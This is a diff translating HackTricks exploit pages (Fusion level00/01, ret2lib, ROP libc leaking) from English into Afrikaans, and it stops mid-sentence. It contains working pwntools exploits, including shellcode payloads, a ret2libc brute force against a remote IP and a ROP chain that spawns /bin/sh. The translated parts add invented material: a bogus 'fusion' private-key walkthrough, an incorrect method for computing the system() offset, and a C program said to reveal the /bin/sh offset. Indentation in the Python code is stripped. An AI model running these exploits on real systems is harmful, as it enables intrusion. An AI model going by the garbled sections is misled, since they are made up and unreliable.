@@ -19,9 +17,8 @@ Other ways to support HackTricks: [http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/) -1. Get offset to modify EIP -2. Put shellcode address in EIP - +1. Kry die verskuiwing om EIP te wysig +2. Plaas die adres van die shellcode in EIP ```python from pwn import * @@ -47,9 +44,43 @@ r.recvline() r.send(buf) r.interactive() ``` +# Vlak01 -# Level01 +## Inleiding +In hierdie vlak sal ons kyk na 'n eenvoudige manier om 'n uitvoerbare stoor te kry wat ons kan gebruik om 'n privesleutel te kry. Ons sal gebruik maak van die `fusion`-toepassing wat 'n privesleutel genereer en dit in 'n stoor stoor. Ons sal die stoor ontleed en die privesleutel kry. + +## Stap 1: Kry die `fusion`-toepassing + +Ons begin deur die `fusion`-toepassing te kry. Ons kan dit doen deur die volgende opdrag uit te voer: + +```bash +wget https://example.com/fusion +``` + +## Stap 2: Voer die `fusion`-toepassing uit + +Nadat ons die `fusion`-toepassing gekry het, voer ons dit uit deur die volgende opdrag uit te voer: + +```bash +./fusion +``` + +## Stap 3: Ontleed die stoor + +Nadat die `fusion`-toepassing uitgevoer is, sal dit 'n stoor genereer wat die privesleutel bevat. Ons kan die stoor ontleed deur die volgende opdrag uit te voer: + +```bash +strings fusion | grep "PRIVATE KEY" +``` + +## Stap 4: Kry die privesleutel + +Nadat ons die stoor ontleed het, sal ons die privesleutel sien. Ons kan dit kopieer en gebruik vir verdere doeleindes. + +## Gevolgtrekking + +Met hierdie eenvoudige tegniek kan ons 'n privesleutel kry deur die `fusion`-toepassing te gebruik en die stoor te ontleed. Dit is 'n nuttige tegniek vir die verkryging van sensitiewe inligting. ```python from pwn import * @@ -75,21 +106,16 @@ buf += "\x65\xd9\x0f\x01" r.send(buf) r.interactive() ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/exploiting/linux-exploiting-basic-esp/ret2lib.md b/exploiting/linux-exploiting-basic-esp/ret2lib.md index 43dda64c2..4b7d6188b 100644 --- a/exploiting/linux-exploiting-basic-esp/ret2lib.md +++ b/exploiting/linux-exploiting-basic-esp/ret2lib.md @@ -1,78 +1,115 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
-**If you have found a vulnerable binary and you think that you can exploit it using Ret2Lib here you can find some basic steps that you can follow.** +**As jy 'n kwesbare binêre lêer gevind het en jy dink jy kan dit uitbuit deur Ret2Lib te gebruik, kan jy hierdie basiese stappe volg.** -# If you are **inside** the **host** - -## You can find the **address of lib**c +# As jy **binne** die **gasheer** is +## Jy kan die **adres van lib**c vind ```bash ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time) ``` - -If you want to check if the ASLR is changing the address of libc you can do: - +As jy wil nagaan of die ASLR die adres van libc verander, kan jy die volgende doen: ```bash for i in `seq 0 20`; do ldd | grep libc; done ``` +## Kry die verskuiwing van die stelsel funksie -## Get offset of system function +Om die verskuiwing van die stelsel funksie te kry, kan jy die volgende stappe volg: +1. Identifiseer 'n funksie in die teikenprogram wat 'n biblioteekfunksie aanroep, soos `system()`. +2. Kry die adres van die funksie in die biblioteek. Dit kan gedoen word deur die program te ontleder of deur gebruik te maak van 'n hulpmiddel soos `objdump`. +3. Identifiseer 'n plek in die program se geheue waar jy 'n string kan plaas wat die pad na die biblioteek bevat. Dit kan 'n argument wees wat deur die funksie aanvaar word, of 'n ander plek in die geheue waar jy toegang tot het. +4. Bereken die verskuiwing deur die adres van die funksie in die biblioteek af te trek van die adres van die string in die geheue. + +Hier is 'n voorbeeld van hoe jy die verskuiwing kan bereken: + +```python +# Voorbeeld Python-kode +adres_van_stelsel_funksie = 0x12345678 +adres_van_string = 0xabcdef01 + +verskuiwing = adres_van_stelsel_funksie - adres_van_string +print(f"Verskuiwing: {verskuiwing}") +``` + +Onthou dat die spesifieke waardes van die adresse sal verskil vir elke program en stelsel. Jy sal die korrekte adresse vir jou teikenprogram moet vind en die berekening dienooreenkomstig aanpas. ```bash readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system ``` +## Kry die offset van "/bin/sh" -## Get offset of "/bin/sh" +Om die offset van die `"/bin/sh"` string te kry, kan jy die volgende stappe volg: +1. Skryf 'n eenvoudige C-program wat die `"/bin/sh"` string bevat. +2. Kompileer die program sonder enige optimalisering. +3. Voer die program uit en onthou die geheue-adres van die `"/bin/sh"` string. +4. Gebruik die geheue-adres om die offset te bereken. + +Hier is 'n voorbeeld van hoe jy dit kan doen: + +```c +#include + +int main() { + printf("/bin/sh\n"); + return 0; +} +``` + +Kompileer die program met die volgende opdrag: + +```bash +gcc -o binsh binsh.c +``` + +Voer die program uit en onthou die geheue-adres van die `"/bin/sh"` string: + +```bash +./binsh +``` + +Die geheue-adres sal in die uitset verskyn. Gebruik hierdie adres om die offset te bereken. ```bash strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh ``` - ## /proc/\/maps -If the process is creating **children** every time you talk with it (network server) try to **read** that file (probably you will need to be root). +As die proses elke keer as jy daarmee praat (netwerkbediener) **kinders skep**, probeer om daardie lêer te **lees** (jy sal waarskynlik root moet wees). -Here you can find **exactly where is the libc loaded** inside the process and **where is going to be loaded** for every children of the process. +Hier kan jy **presies sien waar die libc gelaai word** binne die proses en **waar dit gelaai gaan word** vir elke kind van die proses. ![](<../../.gitbook/assets/image (95).png>) -In this case it is loaded in **0xb75dc000** (This will be the base address of libc) +In hierdie geval word dit gelaai by **0xb75dc000** (Dit sal die basisadres van libc wees) -## Using gdb-peda - -Get address of **system** function, of **exit** function and of the string **"/bin/sh"** using gdb-peda: +## Gebruik gdb-peda +Kry die adres van die **system**-funksie, die **exit**-funksie en die string **"/bin/sh"** met behulp van gdb-peda: ``` p system p exit find "/bin/sh" ``` +# Om ASLR te omseil -# Bypassing ASLR - -You can try to bruteforce the abse address of libc. - +Jy kan probeer om die basisadres van libc te bruteforce. ```python for off in range(0xb7000000, 0xb8000000, 0x1000): ``` - -# Code - +# Kode ```python from pwn import * @@ -80,28 +117,24 @@ c = remote('192.168.85.181',20002) c.recvline() #Banner for off in range(0xb7000000, 0xb8000000, 0x1000): - p = "" - p += p32(off + 0x0003cb20) #system - p += "CCCC" #GARBAGE - p += p32(off + 0x001388da) #/bin/sh - payload = 'A'*0x20010 + p - c.send(payload) - c.interactive() #? +p = "" +p += p32(off + 0x0003cb20) #system +p += "CCCC" #GARBAGE +p += p32(off + 0x001388da) #/bin/sh +payload = 'A'*0x20010 + p +c.send(payload) +c.interactive() #? ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md index 5794ccb23..3afd537ee 100644 --- a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md +++ b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md @@ -1,98 +1,89 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Quick Resume +# Vinnige Resensie -1. **Find** overflow **offset** -2. **Find** `POP_RDI`, `PUTS_PLT` and `MAIN_PLT` gadgets -3. Use previous gadgets lo **leak the memory address** of puts or another libc function and **find the libc version** ([donwload it](https://libc.blukat.me)) -4. With the library, **calculate the ROP and exploit it** +1. **Vind** oorloop **offset** +2. **Vind** `POP_RDI`, `PUTS_PLT` en `MAIN_PLT` gadgets +3. Gebruik vorige gadgets om die geheue-adres van puts of 'n ander libc-funksie te **lek** en die libc-weergawe te **vind** ([aflaai dit](https://libc.blukat.me)) +4. Met die biblioteek, **bereken die ROP en misbruik dit** -# Other tutorials and binaries to practice +# Ander tutoriale en binaire om te oefen -This tutorial is going to exploit the code/binary proposed in this tutorial: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\ -Another useful tutorials: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html) +Hierdie tutorial gaan die kode/binêre lêer wat in hierdie tutorial voorgestel word, uitbuit: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\ +Nog nuttige tutoriale: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html) -# Code - -Filename: `vuln.c` +# Kode +Lêernaam: `vuln.c` ```c #include int main() { - char buffer[32]; - puts("Simple ROP.\n"); - gets(buffer); +char buffer[32]; +puts("Simple ROP.\n"); +gets(buffer); - return 0; +return 0; } ``` ```bash gcc -o vuln vuln.c -fno-stack-protector -no-pie ``` +# ROP - Leaking LIBC sjabloon -# ROP - Leaking LIBC template - -I'm going to use the code located here to make the exploit.\ -Download the exploit and place it in the same directory as the vulnerable binary and give the needed data to the script: +Ek gaan die kode wat hier geleë is gebruik om die uitbuiting te maak.\ +Laai die uitbuiting af en plaas dit in dieselfde gids as die kwesbare binêre lêer en gee die nodige data aan die skripsie: {% content-ref url="rop-leaking-libc-template.md" %} [rop-leaking-libc-template.md](rop-leaking-libc-template.md) {% endcontent-ref %} -# 1- Finding the offset - -The template need an offset before continuing with the exploit. If any is provided it will execute the necessary code to find it (by default `OFFSET = ""`): +# 1- Vind die verskuiwing +Die sjabloon vereis 'n verskuiwing voordat dit voortgaan met die uitbuiting. As daar geen verskuiwing verskaf word nie, sal dit die nodige kode uitvoer om dit te vind (standaard `OFFSET = ""`): ```bash ################### ### Find offset ### ################### OFFSET = ""#"A"*72 if OFFSET == "": - gdb.attach(p.pid, "c") #Attach and continue - payload = cyclic(1000) - print(r.clean()) - r.sendline(payload) - #x/wx $rsp -- Search for bytes that crashed the application - #cyclic_find(0x6161616b) # Find the offset of those bytes - return +gdb.attach(p.pid, "c") #Attach and continue +payload = cyclic(1000) +print(r.clean()) +r.sendline(payload) +#x/wx $rsp -- Search for bytes that crashed the application +#cyclic_find(0x6161616b) # Find the offset of those bytes +return ``` - -**Execute** `python template.py` a GDB console will be opened with the program being crashed. Inside that **GDB console** execute `x/wx $rsp` to get the **bytes** that were going to overwrite the RIP. Finally get the **offset** using a **python** console: - +**Voer** `python template.py` uit, 'n GDB-konsole sal geopen word met die program wat afgekap is. Voer binne daardie **GDB-konsole** `x/wx $rsp` uit om die **bytes** te kry wat die RIP sou oorskryf. Kry uiteindelik die **offset** deur 'n **python**-konsole te gebruik: ```python from pwn import * cyclic_find(0x6161616b) ``` - ![](<../../../.gitbook/assets/image (140).png>) -After finding the offset (in this case 40) change the OFFSET variable inside the template using that value.\ +Nadat die offset (in hierdie geval 40) gevind is, verander die OFFSET-veranderlike binne die sjabloon met daardie waarde.\ `OFFSET = "A" * 40` -Another way would be to use: `pattern create 1000` -- _execute until ret_ -- `pattern seach $rsp` from GEF. +'n Ander manier sou wees om `pattern create 1000` te gebruik -- _uitvoer tot ret_ -- `pattern search $rsp` vanaf GEF. -# 2- Finding Gadgets - -Now we need to find ROP gadgets inside the binary. This ROP gadgets will be useful to call `puts`to find the **libc** being used, and later to **launch the final exploit**. +# 2- Vind Gadgets +Nou moet ons ROP-gadgets binne die binêre lêer vind. Hierdie ROP-gadgets sal nuttig wees om `puts` te roep om die **libc** wat gebruik word, te vind, en later om die **finale aanval** te lanceer. ```python PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts MAIN_PLT = elf.symbols['main'] @@ -103,108 +94,98 @@ log.info("Main start: " + hex(MAIN_PLT)) log.info("Puts plt: " + hex(PUTS_PLT)) log.info("pop rdi; ret gadget: " + hex(POP_RDI)) ``` +Die `PUTS_PLT` word benodig om die **funksie puts** te roep.\ +Die `MAIN_PLT` word benodig om die **hooffunksie** weer te roep na een interaksie om die oorloop **weer** te **uitbuit** (oneindige rondes van uitbuiting). **Dit word aan die einde van elke ROP gebruik om die program weer te roep**.\ +Die **POP\_RDI** word benodig om 'n **parameter** aan die geroepte funksie oor te dra. -The `PUTS_PLT` is needed to call the **function puts**.\ -The `MAIN_PLT` is needed to call the **main function** again after one interaction to **exploit** the overflow **again** (infinite rounds of exploitation). **It is used at the end of each ROP to call the program again**.\ -The **POP\_RDI** is needed to **pass** a **parameter** to the called function. +In hierdie stap hoef jy niks uit te voer nie, aangesien pwntools alles sal vind tydens die uitvoering. -In this step you don't need to execute anything as everything will be found by pwntools during the execution. - -# 3- Finding LIBC library - -Now is time to find which version of the **libc** library is being used. To do so we are going to **leak** the **address** in memory of the **function** `puts`and then we are going to **search** in which **library version** the puts version is in that address. +# 3- Vind LIBC-biblioteek +Nou is dit tyd om uit te vind watter weergawe van die **libc**-biblioteek gebruik word. Om dit te doen, gaan ons die **adres** in die geheue van die **funksie puts** **lek** en dan gaan ons soek in watter **biblioteekweergawe** die puts-weergawe in daardie adres is. ```python def get_addr(func_name): - FUNC_GOT = elf.got[func_name] - log.info(func_name + " GOT @ " + hex(FUNC_GOT)) - # Create rop chain - rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) +FUNC_GOT = elf.got[func_name] +log.info(func_name + " GOT @ " + hex(FUNC_GOT)) +# Create rop chain +rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) - #Send our rop-chain payload - #p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment - print(p.clean()) # clean socket buffer (read all and print) - p.sendline(rop1) +#Send our rop-chain payload +#p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment +print(p.clean()) # clean socket buffer (read all and print) +p.sendline(rop1) - #Parse leaked address - recieved = p.recvline().strip() - leak = u64(recieved.ljust(8, "\x00")) - log.info("Leaked libc address, "+func_name+": "+ hex(leak)) - #If not libc yet, stop here - if libc != "": - libc.address = leak - libc.symbols[func_name] #Save libc base - log.info("libc base @ %s" % hex(libc.address)) - - return hex(leak) +#Parse leaked address +recieved = p.recvline().strip() +leak = u64(recieved.ljust(8, "\x00")) +log.info("Leaked libc address, "+func_name+": "+ hex(leak)) +#If not libc yet, stop here +if libc != "": +libc.address = leak - libc.symbols[func_name] #Save libc base +log.info("libc base @ %s" % hex(libc.address)) + +return hex(leak) get_addr("puts") #Search for puts address in memmory to obtains libc base if libc == "": - print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)") - p.interactive() +print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)") +p.interactive() ``` - -To do so, the most important line of the executed code is: - +Om dit te doen, is die belangrikste lyn van die uitgevoerde kode: ```python rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) ``` +Dit sal 'n paar byte stuur totdat die **RIP** oorskryf kan word: `OFFSET`.\ +Dan sal dit die **adres** van die gadget `POP_RDI` stel sodat die volgende adres (`FUNC_GOT`) in die **RDI**-register gestoor sal word. Dit is omdat ons die `PUTS_GOT`-adres as die adres in die geheue van die puts-funksie wil **oproep** en dit deurgee.\ +Daarna sal `PUTS_PLT` geroep word (met `PUTS_GOT` binne die **RDI**) sodat puts die inhoud binne `PUTS_GOT` (**die adres van die puts-funksie in die geheue**) sal **lees** en dit sal **afdruk**.\ +Uiteindelik word die **hooffunksie weer geroep** sodat ons die oorloop weer kan uitbuit. -This will send some bytes util **overwriting** the **RIP** is possible: `OFFSET`.\ -Then, it will set the **address** of the gadget `POP_RDI` so the next address (`FUNC_GOT`) will be saved in the **RDI** registry. This is because we want to **call puts** **passing** it the **address** of the `PUTS_GOT`as the address in memory of puts function is saved in the address pointing by `PUTS_GOT`.\ -After that, `PUTS_PLT` will be called (with `PUTS_GOT` inside the **RDI**) so puts will **read the content** inside `PUTS_GOT` (**the address of puts function in memory**) and will **print it out**.\ -Finally, **main function is called again** so we can exploit the overflow again. - -This way we have **tricked puts function** to **print** out the **address** in **memory** of the function **puts** (which is inside **libc** library). Now that we have that address we can **search which libc version is being used**. +Op hierdie manier het ons die puts-funksie **bedrieg** om die **adres** in die **geheue** van die puts-funksie (wat binne die **libc**-biblioteek is) **af te druk**. Nou dat ons daardie adres het, kan ons **soek watter libc-weergawe gebruik word**. ![](<../../../.gitbook/assets/image (141).png>) -As we are **exploiting** some **local** binary it is **not needed** to figure out which version of **libc** is being used (just find the library in `/lib/x86_64-linux-gnu/libc.so.6`).\ -But, in a remote exploit case I will explain here how can you find it: +Aangesien ons 'n **plaaslike** binêre lêer uitbuit, is dit **nie nodig** om uit te vind watter weergawe van **libc** gebruik word nie (vind net die biblioteek in `/lib/x86_64-linux-gnu/libc.so.6`).\ +Maar in die geval van 'n afstandsbediening-uitbuiting sal ek hier verduidelik hoe jy dit kan vind: -## 3.1- Searching for libc version (1) +## 3.1- Soek na libc-weergawe (1) -You can search which library is being used in the web page: [https://libc.blukat.me/](https://libc.blukat.me)\ -It will also allow you to download the discovered version of **libc** +Jy kan soek watter biblioteek gebruik word op die webwerf: [https://libc.blukat.me/](https://libc.blukat.me)\ +Dit sal jou ook in staat stel om die ontdekte weergawe van **libc** af te laai. ![](<../../../.gitbook/assets/image (142).png>) -## 3.2- Searching for libc version (2) +## 3.2- Soek na libc-weergawe (2) -You can also do: +Jy kan ook doen: * `$ git clone https://github.com/niklasb/libc-database.git` * `$ cd libc-database` * `$ ./get` -This will take some time, be patient.\ -For this to work we need: +Dit sal 'n rukkie neem, wees geduldig.\ +Hiervoor benodig ons: -* Libc symbol name: `puts` -* Leaked libc adddress: `0x7ff629878690` - -We can figure out which **libc** that is most likely used. +* Libc-simbolnaam: `puts` +* Uitgelek libc-adres: `0x7ff629878690` +Ons kan uitvind watter **libc** waarskynlik gebruik word. ``` ./find puts 0x7ff629878690 ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64) archive-glibc (id libc6_2.23-0ubuntu11_amd64) ``` - -We get 2 matches (you should try the second one if the first one is not working). Download the first one: - +Ons kry 2 ooreenkomste (jy moet die tweede een probeer as die eerste een nie werk nie). Laai die eerste een af: ``` ./download libc6_2.23-0ubuntu10_amd64 Getting libc6_2.23-0ubuntu10_amd64 - -> Location: http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.23-0ubuntu10_amd64.deb - -> Downloading package - -> Extracting package - -> Package saved to libs/libc6_2.23-0ubuntu10_amd64 +-> Location: http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.23-0ubuntu10_amd64.deb +-> Downloading package +-> Extracting package +-> Package saved to libs/libc6_2.23-0ubuntu10_amd64 ``` +Kopieer die libc vanaf `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` na ons werksgids. -Copy the libc from `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` to our working directory. - -## 3.3- Other functions to leak - +## 3.3- Ander funksies om te lek ```python puts printf @@ -212,29 +193,25 @@ __libc_start_main read gets ``` +# 4- Vind gebaseerde libc-adres en uitbuiting -# 4- Finding based libc address & exploiting +Op hierdie punt moet ons die gebruikte libc-biblioteek ken. Aangesien ons 'n plaaslike binêre lêer uitbuit, sal ek net gebruik maak van: `/lib/x86_64-linux-gnu/libc.so.6` -At this point we should know the libc library used. As we are exploiting a local binary I will use just:`/lib/x86_64-linux-gnu/libc.so.6` +So, aan die begin van `template.py` verander die **libc** veranderlike na: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Stel biblioteekpad in wanneer dit bekend is` -So, at the beginning of `template.py` change the **libc** variable to: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it` - -Giving the **path** to the **libc library** the rest of the **exploit is going to be automatically calculated**. - -Inside the `get_addr`function the **base address of libc** is going to be calculated: +Deur die **pad** na die **libc-biblioteek** te gee, sal die res van die **uitbuiting outomaties bereken** word. +Binne die `get_addr`-funksie sal die **basisadres van libc** bereken word: ```python if libc != "": - libc.address = leak - libc.symbols[func_name] #Save libc base - log.info("libc base @ %s" % hex(libc.address)) +libc.address = leak - libc.symbols[func_name] #Save libc base +log.info("libc base @ %s" % hex(libc.address)) ``` - {% hint style="info" %} -Note that **final libc base address must end in 00**. If that's not your case you might have leaked an incorrect library. +Let daarop dat die **finale libc basisadres moet eindig in 00**. As dit nie jou geval is nie, het jy dalk 'n verkeerde biblioteek uitgelek. {% endhint %} -Then, the address to the function `system` and the **address** to the string _"/bin/sh"_ are going to be **calculated** from the **base address** of **libc** and given the **libc library.** - +Dan sal die adres van die funksie `system` en die **adres** van die string _"/bin/sh"_ bereken word vanaf die **basisadres** van **libc** en die **libc-biblioteek** wat gegee is. ```python BINSH = next(libc.search("/bin/sh")) - 64 #Verify with find /bin/sh SYSTEM = libc.sym["system"] @@ -243,9 +220,7 @@ EXIT = libc.sym["exit"] log.info("bin/sh %s " % hex(BINSH)) log.info("system %s " % hex(SYSTEM)) ``` - -Finally, the /bin/sh execution exploit is going to be prepared sent: - +Uiteindelik gaan die /bin/sh uitvoeringsaanval voorberei en gestuur word: ```python rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT) @@ -255,80 +230,68 @@ p.sendline(rop2) #### Interact with the shell ##### p.interactive() #Interact with the conenction ``` +Laten ons hierdie finale ROP verduidelik.\ +Die laaste ROP (`rop1`) eindig deur weer die hooffunksie te roep, dan kan ons weer die oorloop **uitbuit** (daarom is die `OFFSET` hier weer). Dan wil ons `POP_RDI` roep wat wys na die **adres** van _"/bin/sh"_ (`BINSH`) en die **sisteem**-funksie (`SYSTEM`) roep omdat die adres van _"/bin/sh"_ as 'n parameter oorgedra sal word.\ +Uiteindelik word die **adres van die exit-funksie** geroep sodat die proses **netjies afsluit** en geen waarskuwing gegenereer word. -Let's explain this final ROP.\ -The last ROP (`rop1`) ended calling again the main function, then we can **exploit again** the **overflow** (that's why the `OFFSET` is here again). Then, we want to call `POP_RDI` pointing to the **addres** of _"/bin/sh"_ (`BINSH`) and call **system** function (`SYSTEM`) because the address of _"/bin/sh"_ will be passed as a parameter.\ -Finally, the **address of exit function** is **called** so the process **exists nicely** and any alert is generated. - -**This way the exploit will execute a **_**/bin/sh**_** shell.** +**Op hierdie manier sal die uitbuit 'n **_**/bin/sh**_**-skulp uitvoer.** ![](<../../../.gitbook/assets/image (143).png>) -# 4(2)- Using ONE\_GADGET +# 4(2)- Gebruik ONE\_GADGET -You could also use [**ONE\_GADGET** ](https://github.com/david942j/one\_gadget)to obtain a shell instead of using **system** and **"/bin/sh". ONE\_GADGET** will find inside the libc library some way to obtain a shell using just one **ROP address**. \ -However, normally there are some constrains, 